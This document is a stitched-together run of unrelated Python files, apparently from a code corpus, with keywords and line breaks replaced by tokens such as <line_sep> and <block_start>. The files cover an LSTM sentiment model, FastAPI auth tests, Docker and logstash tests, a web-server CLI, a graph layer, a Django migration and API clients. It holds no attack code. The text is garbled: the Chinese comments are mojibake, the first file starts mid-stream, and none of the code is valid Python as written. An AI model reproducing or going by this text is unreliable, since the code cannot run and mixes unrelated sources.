# ๆไปฌ้่ฆๅฃฐๆๆ็ปๅจไฝฟ็จๅฅๅญๅ้ๆ ๅฐๅฐๅ
ทไฝๆ
ๆ็ฑปๅซ่ฟ็จไธญๆ้่ฆไฝฟ็จ็ๅๆฐ
# ่ฟไธชๅๆฐ็ๅคงๅฐไธ่ฌๆฏ[self.hidden_size, self.class_num]
self.cls_fc=Linear(in_features=self.hidden_size out_features=self.class_num weight_attr=<none> bias_attr=<none>)<line_sep>self.dropout_layer=Dropout(p=self.dropout mode='upscale_in_train')<block_end><def_stmt>forward self input label<block_start>batch_size=len(input)<line_sep># ้ฆๅ
ๆไปฌ้่ฆๅฎไนLSTM็ๅๅงhiddenๅcell๏ผ่ฟ้ๆไปฌไฝฟ็จ0ๆฅๅๅงๅ่ฟไธชๅบๅ็่ฎฐๅฟ
init_hidden_data=np.zeros((self.num_layers batch_size self.hidden_size) dtype='float32')<line_sep>init_cell_data=np.zeros((self.num_layers batch_size self.hidden_size) dtype='float32')<line_sep># ๅฐ่ฟไบๅๅง่ฎฐๅฟ่ฝฌๆขไธบ้ฃๆกจๅฏ่ฎก็ฎ็ๅ้
# ่ฎพ็ฝฎstop_gradient=True๏ผ้ฟๅ
่ฟไบๅ้่ขซๆดๆฐ๏ผไป่ๅฝฑๅ่ฎญ็ปๆๆ
init_hidden=paddle.to_tensor(init_hidden_data)<line_sep>init_hidden.stop_gradient=<true><line_sep>init_cell=paddle.to_tensor(init_cell_data)<line_sep>init_cell.stop_gradient=<true><line_sep>init_h=paddle.reshape(init_hidden shape=[self.num_layers -1 self.hidden_size])<line_sep>init_c=paddle.reshape(init_cell shape=[self.num_layers -1 self.hidden_size])<line_sep># ๅฐ่พๅ
ฅ็ๅฅๅญ็mini-batch่ฝฌๆขไธบ่ฏๅ้่กจ็คบ
x_emb=self.embedding(input)<line_sep>x_emb=paddle.reshape(x_emb shape=[-1 self.num_steps self.hidden_size])<if_stmt>self.dropout<is><not><none><and>self.dropout<g>0.0<block_start>x_emb=self.dropout_layer(x_emb)<block_end># ไฝฟ็จLSTM็ฝ็ป๏ผๆๆฏไธชๅฅๅญ่ฝฌๆขไธบๅ้่กจ็คบ
rnn_out,(last_hidden last_cell)=self.simple_lstm_rnn(x_emb (init_h init_c))<line_sep>last_hidden=paddle.reshape(last_hidden[-1] shape=[-1 self.hidden_size])<line_sep># ๅฐๆฏไธชๅฅๅญ็ๅ้่กจ็คบๆ ๅฐๅฐๅ
ทไฝ็ๆ
ๆ็ฑปๅซไธ
projection=self.cls_fc(last_hidden)<line_sep>pred=F.softmax(projection axis=-1)<line_sep># ๆ นๆฎ็ปๅฎ็ๆ ็ญพไฟกๆฏ๏ผ่ฎก็ฎๆดไธช็ฝ็ป็ๆๅคฑๅฝๆฐ๏ผ่ฟ้ๆไปฌๅฏไปฅ็ดๆฅไฝฟ็จๅ็ฑปไปปๅกไธญๅธธไฝฟ็จ็ไบคๅ็ตๆฅ่ฎญ็ป็ฝ็ป
loss=F.softmax_with_cross_entropy(logits=projection label=label soft_label=<false>)<line_sep>loss=paddle.mean(loss)<line_sep># ๆ็ป่ฟๅ้ขๆต็ปๆpred๏ผๅ็ฝ็ป็loss
<return>pred loss<block_end><block_end> |
<import_stmt>pytest<import_from_stmt>demo_project.main app<import_from_stmt>fastapi.testclient TestClient<line_sep>openapi_schema={'openapi':'3.0.2' 'info':{'title':'My Project' 'description':'## Welcome to my API! \n This is my description, written in `markdown`' 'version':'1.0.0' } 'paths':{'/api/v1/hello':{'get':{'tags':['hello'] 'summary':'Say hello' 'description':'Wonder who we say hello to?' 'operationId':'helloWorld' 'responses':{'200':{'description':'Successful Response' 'content':{'application/json':{'schema':{'$ref':'#/components/schemas/HelloWorldResponse'}}} }} 'security':[{'Azure AD - PKCE, Single-tenant':[]}] }} '/api/v1/hello-multi-auth':{'get':{'tags':['hello'] 'summary':'Say hello with an API key' 'description':'Wonder how this auth is done?' 'operationId':'helloWorldApiKey' 'responses':{'200':{'description':'Successful Response' 'content':{'application/json':{'schema':{'$ref':'#/components/schemas/TokenType'}}} }} 'security':[{'Azure AD - PKCE, Multi-tenant':[]} {'APIKeyHeader':[]}] }} } 'components':{'schemas':{'HelloWorldResponse':{'title':'HelloWorldResponse' 'required':['hello' 'user'] 'type':'object' 'properties':{'hello':{'title':'Hello' 'type':'string' 'description':'What we\'re saying hello to'} 'user':{'title':'User' 'allOf':[{'$ref':'#/components/schemas/User'}] 'description':'The user object' } } } 'TokenType':{'title':'TokenType' 'required':['api_key' 'azure_auth'] 'type':'object' 'properties':{'api_key':{'title':'Api Key' 'type':'boolean' 'description':'API key was used'} 'azure_auth':{'title':'Azure Auth' 'type':'boolean' 'description':'Azure auth was used'} } } 'User':{'title':'User' 'required':['aud' 'tid' 'claims' 'access_token'] 'type':'object' 'properties':{'aud':{'title':'Aud' 'type':'string' 'description':'Audience'} 'tid':{'title':'Tid' 'type':'string' 'description':'Tenant ID'} 'roles':{'title':'Roles' 'type':'array' 'items':{'type':'string'} 'description':'Roles (Groups) the user has for this app' 'default':[] } 
'claims':{'title':'Claims' 'type':'object' 'description':'The entire decoded token'} 'scp':{'title':'Scp' 'type':'string' 'description':'Scope'} 'name':{'title':'Name' 'type':'string' 'description':'Name'} 'access_token':{'title':'Access Token' 'type':'string' 'description':'The access_token. Can be used for fetching the Graph API' } } } } 'securitySchemes':{'Azure AD - PKCE, Single-tenant':{'type':'oauth2' 'description':'`Leave client_secret blank`' 'flows':{'authorizationCode':{'scopes':{'api://oauth299-9999-9999-abcd-efghijkl1234567890/user_impersonation':'**No client secret needed, leave blank**'} 'authorizationUrl':'https://login.microsoftonline.com/intility_tenant_id/oauth2/v2.0/authorize' 'tokenUrl':'https://login.microsoftonline.com/intility_tenant_id/oauth2/v2.0/token' }} } 'Azure AD - PKCE, Multi-tenant':{'description':'`Leave '<concat>'client_secret '<concat>'blank`' 'flows':{'authorizationCode':{'authorizationUrl':'https://login.microsoftonline.com/common/oauth2/v2.0/authorize' 'scopes':{'api://oauth299-9999-9999-abcd-efghijkl1234567890/user_impersonation':'User '<concat>'impersonation'} 'tokenUrl':'https://login.microsoftonline.com/common/oauth2/v2.0/token' }} 'type':'oauth2' } 'APIKeyHeader':{'type':'apiKey' 'in':'header' 'name':'TEST-API-KEY'} } } }<line_sep>@pytest.fixture<def_stmt>test_client <block_start>"""
Test client that does not run startup event.
All these tests fails before we get to loading the OpenID Connect configuration.
"""<line_sep><yield>TestClient(app=app)<block_end><def_stmt>test_openapi_schema test_client<block_start>response=test_client.get('api/v1/openapi.json')<assert_stmt>response.status_code<eq>200 response.text<assert_stmt>response.json()<eq>openapi_schema<block_end><def_stmt>test_no_token test_client<block_start>response=test_client.get('/api/v1/hello')<assert_stmt>response.status_code<eq>401 response.text<assert_stmt>response.json()<eq>{'detail':'Not authenticated'}<block_end><def_stmt>test_incorrect_token test_client<block_start>response=test_client.get('/api/v1/hello' headers={'Authorization':'Non-existent testtoken'})<assert_stmt>response.status_code<eq>401 response.text<assert_stmt>response.json()<eq>{'detail':'Not authenticated'}<block_end><def_stmt>test_token test_client<block_start>response=test_client.get('/api/v1/hello' headers={'Authorization':'Bearer '})<assert_stmt>response.status_code<eq>401 response.text<assert_stmt>response.json()<eq>{'detail':'Invalid token format'}<block_end> |
# -*- coding: utf-8 -*-
#
# Copyright (c) 2020 VMware, Inc. All Rights Reserved.
# SPDX-License-Identifier: BSD-2-Clause
<import_stmt>unittest<import_from_stmt>tern.load docker_api<import_from_stmt>tern.utils rootfs<import_from_stmt>test_fixtures create_working_dir<import_from_stmt>test_fixtures remove_working_dir<class_stmt>TestLoadDockerAPI(unittest.TestCase)<block_start>"""This test case requires a temporary folder to be set up and the Docker
daemon to be up and running properly"""<def_stmt>setUp self<block_start>self.client=docker_api.check_docker_setup()<line_sep>create_working_dir()<line_sep>rootfs.set_working_dir()<block_end><def_stmt>tearDown self# should not do anything if the client is already closed
<block_start>docker_api.close_client(self.client)<line_sep># clean up working directory
remove_working_dir()<block_end><def_stmt>testBuildAndRemoveImage self# working dockerfile
<block_start>dockerfile_path='tests/dockerfiles/debian_buster_apt'<line_sep>image_obj=docker_api.build_image(dockerfile_path self.client)<line_sep>self.assertTrue(image_obj)<line_sep># successful remove
self.assertTrue(docker_api.remove_image(image_obj self.client))<line_sep># remove an image that is not there
self.assertFalse(docker_api.remove_image(image_obj self.client))<line_sep># no dockerfile
image_obj=docker_api.build_image('dockerfiles/not_there' self.client)<line_sep>self.assertFalse(image_obj)<line_sep># failed build
image_obj=docker_api.build_image('tests/dockerfiles/fail_build' self.client)<line_sep>self.assertFalse(image_obj)<block_end><def_stmt>testExtractImage self# successful save
<block_start>dockerfile_path='tests/dockerfiles/debian_buster_apt'<line_sep>image_obj=docker_api.build_image(dockerfile_path self.client)<line_sep>self.assertTrue(docker_api.extract_image(image_obj))<line_sep>docker_api.remove_image(image_obj self.client)<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>unittest.main()<block_end> |
"""
Expected to be run from repo root
"""<import_stmt>shutil<import_stmt>os<def_stmt>copy_golds dir_path<block_start><for_stmt>f os.listdir(os.path.join(dir_path "gold"))<block_start><try_stmt><block_start>shutil.copy(os.path.join(dir_path "build" f) os.path.join(dir_path "gold" f))<block_end><except_stmt>FileNotFoundError<as>e# corresponding build has different name or extra file
<block_start><pass><block_end><block_end><block_end>copy_golds("tests")<for_stmt>name os.listdir("tests")<block_start><if_stmt><not>os.path.isdir(os.path.join("tests" name))<block_start><continue><block_end><if_stmt>"gold"<in>os.listdir(os.path.join("tests" name))<block_start>copy_golds(os.path.join("tests" name))<block_end><block_end> |
# -*- coding: utf-8 -*-
"""
Created on Wed Aug 1 14:52:43 2018
@author: user
"""<import_stmt>pandas<as>pd<import_from_stmt>keras preprocessing<import_stmt>os<import_stmt>datetime<import_from_stmt>multiclass.AnalizeRunner AnalizeRunner<line_sep>##################################################
prefix="dataset"<line_sep>data_path="C:\\Users\\afy\\PycharmProjects\\AnalizeProject\\deep-learning\Data\\result\\2018-09-19 23_05_12.089157\\filtered\\"<line_sep>model_path="C:\\Users\\afy\\PycharmProjects\\AnalizeProject\\multiclass\\result\\"<line_sep>main_folder_name=model_path+str(datetime.datetime.now()).replace(":" "_")+"\\"<line_sep>runner=AnalizeRunner()<def_stmt>read_type_data <block_start>df=pd.read_csv(data_path+prefix+"_types.zip" delimiter=' ' header=<none> compression="zip")<line_sep>df[0]=df[0].astype('category')<line_sep>cat=df[0].cat<line_sep>df[0]=df[0].cat.codes<line_sep>y=df[0].values<line_sep><return>y<block_end><def_stmt>read_call_data <block_start>df=pd.read_csv(data_path+prefix+"_calls.zip" delimiter=' ' header=<none> compression="zip")<line_sep>D=df.values<line_sep>ds_tmp=D[: 0].tolist()<line_sep>ds=[]<for_stmt>v ds_tmp<block_start>ds.append(v.split(','))<block_end>X=preprocessing.sequence.pad_sequences(ds maxlen=342)<line_sep>print(X.shape)<line_sep><return>X<block_end>os.makedirs(main_folder_name)<line_sep>print("-------------------basliyor------------")<line_sep>X=read_call_data()<line_sep>y=read_type_data()<line_sep>runner.startAnalize(X y main_folder_name)<line_sep> |
<import_from_future_stmt> annotations<import_stmt>os<import_stmt>signal<import_stmt>subprocess<import_stmt>sys<import_stmt>time<import_from_stmt>multiprocessing cpu_count<import_from_stmt>typing List Union<import_stmt>click<import_from_stmt>.__version__ __version__<import_from_stmt>.routing.commands display_urls<import_from_stmt>.utils F import_from_string import_module<def_stmt>execute command:Union[List[str] str]<arrow>int<block_start><if_stmt>isinstance(command str)<block_start>command=command.split(" ")<block_end>click.echo("Execute command: " nl=<false>)<line_sep>click.secho(" ".join(command) fg="green")<line_sep>process=subprocess.Popen(command shell=<false>)<def_stmt>sigint_handler signo frame<block_start>process.terminate()<line_sep>process.wait()<block_end>signal.signal(signal.SIGTERM sigint_handler)<while_stmt>process.poll()<is><none><block_start>time.sleep(1)<block_end><return>process.returncode<block_end>@click.group(help=f"Index.py {__version__}")<def_stmt>index_cli <block_start><pass><block_end><try_stmt><block_start><import_stmt>hypercorn<block_end><except_stmt>ImportError<block_start><pass><block_end><else_stmt><block_start>@click.command(help="use hypercorn to run Index.py application")@click.option("--bind" default="127.0.0.1:4190" show_default=<true> help="A string of the form: HOST:PORT, unix:PATH, fd://FD." 
)@click.option("--log-level" type=click.Choice(["critical" "error" "warning" "info" "debug"]) default="info" show_default=<true> )@click.option("--worker-class" "-k" default="asyncio" type=click.Choice(["asyncio" "uvloop" "trio"]) show_choices=<true> show_default=<true> )@click.option("--configuration" "-c" type=click.Path(exists=<true> file_okay=<true> dir_okay=<false> readable=<true>) )@click.argument("application")<def_stmt>hypercorn_cli worker_class:str configuration:str application:str bind:str log_level:str <block_start>sys.path.insert(0 os.getcwd())<line_sep>asgi_app=import_from_string(application)<line_sep>config=hypercorn.Config()<if_stmt>configuration<is><not><none><block_start><if_stmt>configuration.endswith(".py")<block_start>config.from_pyfile(configuration)<block_end><elif_stmt>configuration.endswith(".toml")<block_start>config.from_toml(configuration)<block_end><else_stmt><block_start>click.secho("Please use configuration file path endswith `.py` or `.toml`." fg="red" )<line_sep><raise>SystemExit(1)<block_end><block_end>config.bind=[bind]<line_sep>config.loglevel=log_level.upper()<line_sep>config.worker_class=worker_class<line_sep>create_signal_handle=<lambda>shutdown_event:<lambda>sig frame:(setattr(asgi_app "should_exit" <true>) # type: ignore
shutdown_event.set() )<if_stmt>worker_class<eq>"uvloop"<block_start><import_stmt>uvloop<line_sep>uvloop.install()<block_end><if_stmt>worker_class<in>("asyncio" "uvloop")<block_start><import_stmt>asyncio<import_from_stmt>hypercorn.asyncio serve<line_sep>loop=asyncio.get_event_loop()<line_sep>shutdown_event=asyncio.Event(loop=loop)<for_stmt>sig {signal.SIGINT signal.SIGTERM}<block_start>signal.signal(sig create_signal_handle(shutdown_event))<block_end>loop.run_until_complete(serve(asgi_app config shutdown_trigger=shutdown_event.wait)# type: ignore
)<block_end><else_stmt><block_start><import_stmt>trio<import_from_stmt>hypercorn.trio serve# type: ignore
shutdown_event=trio.Event()<for_stmt>sig {signal.SIGINT signal.SIGTERM}<block_start>signal.signal(sig create_signal_handle(shutdown_event))<block_end>trio.run(serve(asgi_app config shutdown_trigger=shutdown_event.wait))<block_end><block_end># type: ignore
index_cli.add_command(hypercorn_cli name="hypercorn")<block_end><try_stmt><block_start><import_stmt>uvicorn<block_end><except_stmt>ImportError<block_start><pass><block_end><else_stmt><block_start><import_from_stmt>.applications Index<line_sep># See https://stackoverflow.com/questions/58133694/graceful-shutdown-of-uvicorn-starlette-app-with-websockets
origin_handle_exit=uvicorn.Server.handle_exit<def_stmt>handle_exit self:uvicorn.Server sig frame<block_start>application=self.config.loaded_app<while_stmt><not>isinstance(application Index)<block_start>application=application.app<block_end>application.should_exit=<true><line_sep><return>origin_handle_exit(self sig frame)<block_end>uvicorn.Server.handle_exit=handle_exit<line_sep>@click.command(help="use uvicorn to run Index.py application")@click.option("--bind" default="127.0.0.1:4190" show_default=<true> help="A string of the form: HOST:PORT, unix:PATH, fd://FD." )@click.option("--autoreload/--no-autoreload" default=<true> show_default=<true>)@click.option("--log-level" type=click.Choice(["critical" "error" "warning" "info" "debug"]) default="info" show_default=<true> )@click.argument("application")<def_stmt>uvicorn_cli application:str bind:str autoreload:bool log_level:str<block_start>sys.path.insert(0 os.getcwd())<if_stmt>bind.startswith("unix:")<block_start>bind_config={"uds":bind[5:]|F(os.path.normpath)|F(os.path.abspath)}<if_stmt>autoreload<block_start>click.secho("Reload option doesnt work with unix sockets "<concat>"in uvicorn: https://github.com/encode/uvicorn/issues/722" fg="yellow" )<block_end><block_end><elif_stmt>bind.startswith("fd://")<block_start>bind_config={"fd":int(bind[5:])}<if_stmt>autoreload<block_start>click.secho("Reload option doesnt work with fd "<concat>"in uvicorn: https://github.com/encode/uvicorn/issues/368" fg="yellow" )<block_end><block_end><else_stmt><block_start><if_stmt>":"<in>bind<block_start>host,port=bind.split(":")<line_sep>bind_config={"host":host "port":int(port)}<block_end><else_stmt><block_start>bind_config={"host":bind "port":4190}<block_end><block_end>uvicorn.run(application **bind_config log_level=log_level interface="asgi3" lifespan="on" reload=autoreload )<block_end>index_cli.add_command(uvicorn_cli "uvicorn")<block_end><try_stmt><block_start><import_stmt>gunicorn<assert_stmt>gunicorn.version_info<g>(20 
1)<del_stmt>gunicorn<block_end><except_stmt>ImportError<block_start><pass><block_end><else_stmt><block_start>MASTER_PID_FILE=".gunicorn.pid"<def_stmt>read_gunicorn_master_pid pid_file:str=MASTER_PID_FILE<arrow>int<block_start><try_stmt><block_start><with_stmt>open(os.path.join(os.getcwd() pid_file) "r")<as>file<block_start><return>int(file.read())<block_end><block_end><except_stmt>FileNotFoundError<block_start>sys.exit((f'File "{pid_file}" not found, '+"please make sure you have started gunicorn using the "+"`index-cli gunicorn start ...`."))<block_end><block_end>@click.group(help="use gunicorn to run Index.py application")<def_stmt>gunicorn_cli <block_start><pass><block_end>@gunicorn_cli.command(help="Run gunicorn")@click.option("--bind" default="127.0.0.1:4190" show_default=<true> help="A string of the form: HOST:PORT, unix:PATH, fd://FD." )@click.option("--autoreload/--no-autoreload" default=<false> show_default=<true>)@click.option("--log-level" type=click.Choice(["critical" "error" "warning" "info" "debug"]) default="info" show_default=<true> )@click.option("--workers" "-w" default=cpu_count() show_default=<true>)@click.option("--worker-class" "-k" default="uvicorn.workers.UvicornWorker" show_default=<true> )@click.option("--daemon" "-d" default=<false> is_flag=<true> show_default=<true>)@click.option("--configuration" "-c" type=click.Path(exists=<true> file_okay=<true> dir_okay=<false> readable=<true>) )@click.argument("application")<def_stmt>start workers:int worker_class:str daemon:bool configuration:str application:str bind:str autoreload:bool log_level:str <block_start>command=(f"{sys.executable} -m gunicorn -k {worker_class}"+f" --bind {bind}"+f" --chdir {os.getcwd()}"+f" --workers {workers}"+f" --pid {MASTER_PID_FILE}"+f" --log-level {log_level}")<line_sep>args=command.split(" ")<if_stmt>daemon<block_start>args.extend("-D --log-file gunicorn.log".split(" 
"))<block_end><if_stmt>autoreload<block_start>args.append("--reload")<block_end><if_stmt>configuration<block_start>args.append("-c")<line_sep>args.append(configuration.strip())<block_end>args.append(application)<line_sep>execute(args)<block_end># Gunicorn signal handler
# https://docs.gunicorn.org/en/stable/signals.html
@gunicorn_cli.command(help="Increment the number of processes by one")<def_stmt>incr <block_start>os.kill(read_gunicorn_master_pid() signal.SIGTTIN)<block_end>@gunicorn_cli.command(help="Decrement the number of processes by one")<def_stmt>decr <block_start>os.kill(read_gunicorn_master_pid() signal.SIGTTOU)<block_end>@gunicorn_cli.command(help="Stop gunicorn processes")@click.option("--force" "-f" default=<false> is_flag=<true>)<def_stmt>stop force<block_start>os.kill(read_gunicorn_master_pid() signal.SIGINT<if>force<else>signal.SIGTERM)<block_end>@gunicorn_cli.command(help="Reload configuration and recreate worker processes")<def_stmt>reload <block_start>os.kill(read_gunicorn_master_pid() signal.SIGHUP)<block_end>@gunicorn_cli.command(help="Restart gunicorn master processes and worker processes")@click.option("--force-stop" "-f" default=<false> is_flag=<true>)<def_stmt>restart force_stop<block_start>oldpid=read_gunicorn_master_pid()<line_sep>os.kill(oldpid signal.SIGUSR2)<line_sep># Waiting for starting new master process and worker processes
<while_stmt><not>os.path.exists(os.path.join(os.getcwd() MASTER_PID_FILE+".2"))<block_start>time.sleep(0.5)<block_end># Stop old master process and worker processes
os.kill(oldpid signal.SIGINT<if>force_stop<else>signal.SIGTERM)<block_end>index_cli.add_command(gunicorn_cli "gunicorn")<block_end>index_cli.add_command(display_urls "display-urls")<line_sep>import_module("commands")<line_sep> |
<import_stmt>torch<import_stmt>torch.nn.functional<as>F<import_from_stmt>cogdl.utils spmm<import_from_stmt>. BaseLayer<class_stmt>GINELayer(BaseLayer)<block_start>r"""The modified GINConv operator from the `"Graph convolutions that can finally model local structure" paper
<https://arxiv.org/pdf/2011.15069.pdf>`__.
Parameters
----------
apply_func : callable layer function)
layer or function applied to update node feature
eps : float32, optional
Initial `\epsilon` value.
train_eps : bool, optional
If True, `\epsilon` will be a learnable parameter.
"""<def_stmt>__init__ self apply_func=<none> eps=0 train_eps=<true><block_start>super(GINELayer self).__init__()<if_stmt>train_eps<block_start>self.eps=torch.nn.Parameter(torch.FloatTensor([eps]))<block_end><else_stmt><block_start>self.register_buffer("eps" torch.FloatTensor([eps]))<block_end>self.apply_func=apply_func<block_end><def_stmt>forward self graph x# m = self.message(x[graph.edge_index[0]], graph.edge_attr)
# out = self.aggregate(graph, m)
<block_start>out=spmm(graph x)<line_sep>out<augadd>(1+self.eps)<times>x<if_stmt>self.apply_func<is><not><none><block_start>out=self.apply_func(out)<block_end><return>out<block_end><def_stmt>message self x attr<block_start><return>F.relu(x+attr)<block_end><block_end> |
# Generated by Django 2.0.4 on 2018-05-28 20:33
<import_from_stmt>django.db migrations<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[('events' '0009_auto_20180428_0845') ]<line_sep>operations=[migrations.RemoveField(model_name='comment' name='created_by' ) migrations.RemoveField(model_name='comment' name='event' ) migrations.DeleteModel(name='Comment' ) ]<block_end> |
<import_from_stmt>django.template Library<line_sep>register=Library()<def_stmt>mobileadmin_media_prefix <block_start>"""
Returns the string contained in the setting MOBILEADMIN_MEDIA_PREFIX.
"""<try_stmt><block_start><import_from_stmt>mobileadmin.conf settings<block_end><except_stmt>ImportError<block_start><return>''<block_end><return>settings.MEDIA_PREFIX<block_end>mobileadmin_media_prefix=register.simple_tag(mobileadmin_media_prefix)<line_sep> |
<import_stmt>logging<import_stmt>requests<import_from_stmt>settings_csv ALGO_NFDOMAINS<line_sep># API documentation: https://editor.swagger.io/?url=https://api.testnet.nf.domains/info/openapi3.yaml
<class_stmt>NFDomainsAPI<block_start>session=requests.Session()<def_stmt>get_address self name<block_start>endpoint=f"nfd/{name}"<line_sep>params={"view":"brief"}<line_sep>data,status_code=self._query(ALGO_NFDOMAINS endpoint params)<if_stmt>status_code<eq>200# https://docs.nf.domains/docs/faq#how-do-i-set-my-address-to-resolve-my-nfd
# If present, use the primary/deposit address, otherwise resolve to the owner address
<block_start><if_stmt>"caAlgo"<in>data<block_start><return>data["caAlgo"][0]<block_end><else_stmt><block_start><return>data["owner"]<block_end><block_end><else_stmt><block_start><return><none><block_end><block_end><def_stmt>_query self base_url endpoint params=<none><block_start>logging.info("Querying NFDomains endpoint %s..." endpoint)<line_sep>url=f"{base_url}/{endpoint}"<line_sep>response=self.session.get(url params=params)<line_sep><return>response.json() response.status_code<block_end><block_end> |
<import_from_stmt>.fixtures logstash<import_from_stmt>.constants logstash_version_string<def_stmt>test_logstash_is_the_correct_version logstash<block_start><assert_stmt>logstash_version_string<in>logstash.stdout_of('logstash --version')<block_end><def_stmt>test_the_default_user_is_logstash logstash<block_start><assert_stmt>logstash.stdout_of('whoami')<eq>'logstash'<block_end><def_stmt>test_that_the_user_home_directory_is_usr_share_logstash logstash<block_start><assert_stmt>logstash.environment('HOME')<eq>'/usr/share/logstash'<block_end><def_stmt>test_locale_variables_are_set_correctly logstash<block_start><assert_stmt>logstash.environment('LANG')<eq>'en_US.UTF-8'<assert_stmt>logstash.environment('LC_ALL')<eq>'en_US.UTF-8'<block_end><def_stmt>test_opt_logstash_is_a_symlink_to_usr_share_logstash logstash<block_start><assert_stmt>logstash.stdout_of('realpath /opt/logstash')<eq>'/usr/share/logstash'<block_end><def_stmt>test_all_logstash_files_are_owned_by_logstash logstash<block_start><assert_stmt>logstash.stdout_of('find /usr/share/logstash ! -user logstash')<eq>''<block_end><def_stmt>test_logstash_user_is_uid_1000 logstash<block_start><assert_stmt>logstash.stdout_of('id -u logstash')<eq>'1000'<block_end><def_stmt>test_logstash_user_is_gid_1000 logstash<block_start><assert_stmt>logstash.stdout_of('id -g logstash')<eq>'1000'<block_end><def_stmt>test_logging_config_does_not_log_to_files logstash<block_start><assert_stmt>logstash.stdout_of('grep RollingFile /logstash/config/log4j2.properties')<eq>''<block_end># REF: https://docs.openshift.com/container-platform/3.5/creating_images/guidelines.html
<def_stmt>test_all_files_in_logstash_directory_are_gid_zero logstash<block_start>bad_files=logstash.stdout_of('find /usr/share/logstash ! -gid 0').split()<assert_stmt>len(bad_files)<is>0<block_end><def_stmt>test_all_directories_in_logstash_directory_are_setgid logstash<block_start>bad_dirs=logstash.stdout_of('find /usr/share/logstash -type d ! -perm /g+s').split()<assert_stmt>len(bad_dirs)<is>0<block_end> |
<import_from_stmt>typing List<import_stmt>pytest<import_from_stmt>rotkehlchen.chain.ethereum.interfaces.ammswap.types LiquidityPool LiquidityPoolEvent<import_from_stmt>.utils LP_1_EVENTS LP_1_EVENTS_BALANCE LP_2_EVENTS LP_2_EVENTS_BALANCE LP_3_BALANCE LP_3_EVENTS LP_3_EVENTS_BALANCE TEST_ADDRESS_1 <line_sep>@pytest.mark.parametrize('ethereum_modules' [['uniswap']])<def_stmt>test_no_events_no_balances rotkehlchen_api_server<block_start>rotki=rotkehlchen_api_server.rest_api.rotkehlchen<line_sep>events:List[LiquidityPoolEvent]=[]<line_sep>balances:List[LiquidityPool]=[]<line_sep>events_balances=rotki.chain_manager.get_module('uniswap')._calculate_events_balances(address=TEST_ADDRESS_1 events=events balances=balances )<assert_stmt>events_balances<eq>[]<block_end>@pytest.mark.parametrize('ethereum_modules' [['uniswap']])<def_stmt>test_single_pool_without_balances rotkehlchen_api_server<block_start>rotki=rotkehlchen_api_server.rest_api.rotkehlchen<line_sep>balances:List[LiquidityPool]=[]<line_sep>events_balances=rotki.chain_manager.get_module('uniswap')._calculate_events_balances(address=TEST_ADDRESS_1 events=LP_1_EVENTS balances=balances )<assert_stmt>events_balances<eq>[LP_1_EVENTS_BALANCE]<block_end>@pytest.mark.parametrize('ethereum_modules' [['uniswap']])<def_stmt>test_multiple_pools_without_balances rotkehlchen_api_server<block_start>rotki=rotkehlchen_api_server.rest_api.rotkehlchen<line_sep>events=list(LP_1_EVENTS)<line_sep>events.extend(LP_2_EVENTS)<line_sep>balances:List[LiquidityPool]=[]<line_sep>events_balances=rotki.chain_manager.get_module('uniswap')._calculate_events_balances(address=TEST_ADDRESS_1 events=events balances=balances )<assert_stmt>events_balances<eq>[LP_1_EVENTS_BALANCE LP_2_EVENTS_BALANCE]<block_end>@pytest.mark.parametrize('ethereum_modules' [['uniswap']])<def_stmt>test_single_pool_with_balances rotkehlchen_api_server<block_start>"""Test LP current balances are factorized in the pool events balance
"""<line_sep>rotki=rotkehlchen_api_server.rest_api.rotkehlchen<line_sep>events_balances=rotki.chain_manager.get_module('uniswap')._calculate_events_balances(address=TEST_ADDRESS_1 events=LP_3_EVENTS balances=[LP_3_BALANCE] )<assert_stmt>events_balances<eq>[LP_3_EVENTS_BALANCE]<block_end> |
# Copyright (c) LinkedIn Corporation. All rights reserved. Licensed under the BSD-2 Clause license.
# See LICENSE in the project root for license information.
<import_stmt>requests<import_stmt>time<import_from_stmt>testutils prefix api_v0<line_sep>start,end=int(time.time()) int(time.time()+36000)<line_sep>start=start/1000<times>1000<line_sep>end=end/1000<times>1000<line_sep># Helper function to send an override request
<def_stmt>override start_time end_time ev_ids user<block_start>re=requests.post(api_v0('events/override') json={'start':start_time 'end':end_time 'event_ids':ev_ids 'user':user})<assert_stmt>re.status_code<eq>200<line_sep><return>re<block_end># Test override when events need to be split
# Test override when events need to be split:
# the override window lies strictly inside the event, so the original
# event is split into a leading and a trailing remnant.
@prefix('test_v0_override_split')
def test_api_v0_override_split(team, user, role, event):
    team_name = team.create()
    user_name = user.create()
    override_user = user.create()
    role_name = role.create()
    user.add_to_team(user_name, team_name)
    user.add_to_team(override_user, team_name)
    ev_id = event.create({'start': start, 'end': end, 'user': user_name,
                          'team': team_name, 'role': role_name})

    re = override(start + 100, end - 100, [ev_id], override_user)
    data = re.json()
    # Two remnants for the original user + one override event.
    assert len(data) == 3

    # Original user keeps the head and tail slices of the event.
    re = requests.get(api_v0('events?user=' + user_name))
    events = sorted(re.json(), key=lambda x: x['start'])
    assert len(events) == 2
    assert events[0]['end'] == start + 100
    assert events[1]['start'] == end - 100

    # Override user owns the middle slice.
    re = requests.get(api_v0('events?user=' + override_user))
    events = re.json()
    assert events[0]['start'] == start + 100
    assert events[0]['end'] == end - 100


# Test override when an event's start needs to be edited:
# the override window covers the beginning of the event.
@prefix('test_v0_override_edit_start')
def test_api_v0_override_edit_start(team, user, role, event):
    team_name = team.create()
    user_name = user.create()
    override_user = user.create()
    role_name = role.create()
    user.add_to_team(user_name, team_name)
    user.add_to_team(override_user, team_name)
    ev_id = event.create({'start': start, 'end': end, 'user': user_name,
                          'team': team_name, 'role': role_name})

    re = override(start, end - 100, [ev_id], override_user)
    data = re.json()
    # Edited original + the override event.
    assert len(data) == 2

    # Original event is pushed forward to where the override ends.
    re = requests.get(api_v0('events?user=' + user_name))
    events = re.json()
    assert len(events) == 1
    assert events[0]['end'] == end
    assert events[0]['start'] == end - 100

    re = requests.get(api_v0('events?user=' + override_user))
    events = re.json()
    assert events[0]['start'] == start
    assert events[0]['end'] == end - 100


# Test override when an event's end needs to be edited:
# the override window covers the tail of the event.
@prefix('test_api_v0_override_edit_end')
def test_api_v0_override_edit_end(team, user, role, event):
    team_name = team.create()
    user_name = user.create()
    override_user = user.create()
    role_name = role.create()
    user.add_to_team(user_name, team_name)
    user.add_to_team(override_user, team_name)
    ev_id = event.create({'start': start, 'end': end, 'user': user_name,
                          'team': team_name, 'role': role_name})

    re = override(start + 100, end, [ev_id], override_user)
    data = re.json()
    assert len(data) == 2

    # Original event is truncated to where the override begins.
    re = requests.get(api_v0('events?user=' + user_name))
    events = re.json()
    assert len(events) == 1
    assert events[0]['end'] == start + 100
